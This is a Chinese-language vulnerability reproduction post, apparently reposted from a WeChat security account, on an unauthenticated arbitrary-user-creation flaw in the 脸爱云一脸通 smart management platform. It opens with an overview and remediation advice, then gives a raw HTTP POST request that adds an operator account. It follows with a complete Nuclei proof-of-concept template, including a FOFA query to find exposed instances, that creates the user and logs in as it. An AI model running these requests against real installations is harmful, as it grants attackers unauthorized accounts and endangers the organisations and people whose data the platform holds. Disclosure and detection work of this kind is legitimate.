「漏洞复现」脸爱云一脸通智慧管理平台任意用户添加

admin

104707
文章

87
评论

2023年11月24日12:39:04评论60 views字数 2596阅读8分39秒阅读模式

免责声明

「漏洞复现」脸爱云一脸通智慧管理平台任意用户添加

此内容仅供技术交流与学习，请勿用于未经授权的场景。请遵循相关法律与道德规范。任何因使用本文所述技术而引发的法律责任，与本文作者及发布平台无关。如有内容争议或侵权，请及时联系我们。谢谢！

「漏洞复现」脸爱云一脸通智慧管理平台任意用户添加

漏洞概述

「漏洞复现」脸爱云一脸通智慧管理平台任意用户添加

脸爱云一脸通智慧管理平台存在严重漏洞，允许攻击者通过未经授权的访问，在系统中任意添加用户。攻击者可滥用此漏洞创建虚假账户，提升权限，或执行其他危险操作。成功利用漏洞可能导致未经授权的系统访问，危及用户隐私和整体系统安全。为确保系统安全，强烈建议立即修复漏洞，加强用户添加功能的输入验证和访问控制，以限制仅授权用户能够执行此操作。

「漏洞复现」脸爱云一脸通智慧管理平台任意用户添加

漏洞复现

「漏洞复现」脸爱云一脸通智慧管理平台任意用户添加

POST /SystemMng.ashx HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeCookie: ASP.NET_SessionId=whnrkuaqbz0lyv1fbwtzf23yUpgrade-Insecure-Requests: 1Content-Type: application/x-www-form-urlencodedContent-Length: 175
operatorName=test1&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators

「漏洞复现」脸爱云一脸通智慧管理平台任意用户添加

NUCLEI POC

「漏洞复现」脸爱云一脸通智慧管理平台任意用户添加

id: lianaiyun-yiliantong-SystemMng-useraddinfo:  name: 脸爱云 一脸通智慧管理平台任意用户添加漏洞  author: rain  severity: high  description: |    脸爱云 一脸通智慧管理平台存在严重漏洞，允许攻击者通过未经授权的访问，在系统中任意添加用户。攻击者可滥用此漏洞创建虚假账户，提升权限，或执行其他危险操作。成功利用漏洞可能导致未经授权的系统访问，危及用户隐私和整体系统安全。为确保系统安全，强烈建议立即修复漏洞，加强用户添加功能的输入验证和访问控制，以限制仅授权用户能够执行此操作。  metadata:    fofa-query: title=="欢迎使用脸爱云 一脸通智慧管理平台"
http:  - raw:      - |         POST /SystemMng.ashx HTTP/1.1        Host: {{Hostname}}        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2        Accept-Encoding: gzip, deflate        Connection: close        Cookie: ASP.NET_SessionId=whnrkuaqbz0lyv1fbwtzf23y        Upgrade-Insecure-Requests: 1        Content-Type: application/x-www-form-urlencoded        Content-Length: 175
        operatorName=test1&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators      - |         POST /SystemMng.ashx HTTP/1.1        Host: {{Hostname}}        Cookie: uName=rs6NHOsENwI=; ASP.NET_SessionId=vc0efscjhrtrwr2a5rsdugbr        Accept-Language: zh-CN,zh;q=0.9        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36        Accept: */*        sec-ch-ua: "Google Chrome";v="118", "Chromium";v="118", "Not=A?Brand";v="24"        sec-ch-ua-mobile: ?0        Content-Type: application/x-www-form-urlencoded; charset=UTF-8        X-Requested-With: XMLHttpRequest        sec-ch-ua-platform: "Windows"        Accept-Encoding: gzip, deflate        Content-Length: 48
        name=test1&pwd=123456&keeps=0&funcName=UserLogin    matchers:      - type: dsl        dsl:          - 'status_code==200 && contains_all(body_2,"1")'

「漏洞复现」脸爱云一脸通智慧管理平台任意用户添加

原文始发于微信公众号（知黑守白）：「漏洞复现」脸爱云一脸通智慧管理平台任意用户添加

左青龙
微信扫一扫

右白虎
微信扫一扫

「漏洞复现」脸爱云一脸通智慧管理平台任意用户添加

【漏洞预警/复现】广州安*通信技术有限公司secnet安网智能AC管理系统信息泄露漏洞复现 CNVD-2022-86158

漏洞预警 | Ruvar OA SQL注入漏洞

漏洞预警 | User Meta敏感信息泄露漏洞

漏洞预警 | 联软安全数据交换系统任意文件读取漏洞

Typora远程代码执行漏洞（CVE-2023-2317）

CVE-2024-34220

MeterSphere | CVE-2023-38494

漏洞复现 JeecgBoot SSTI RCE漏洞

漏洞预警 | Apache Commons Compress拒绝服务漏洞

CVE-2023-38146（ThemeBleed）的概念验证 POC

发表评论

在线咨询

微信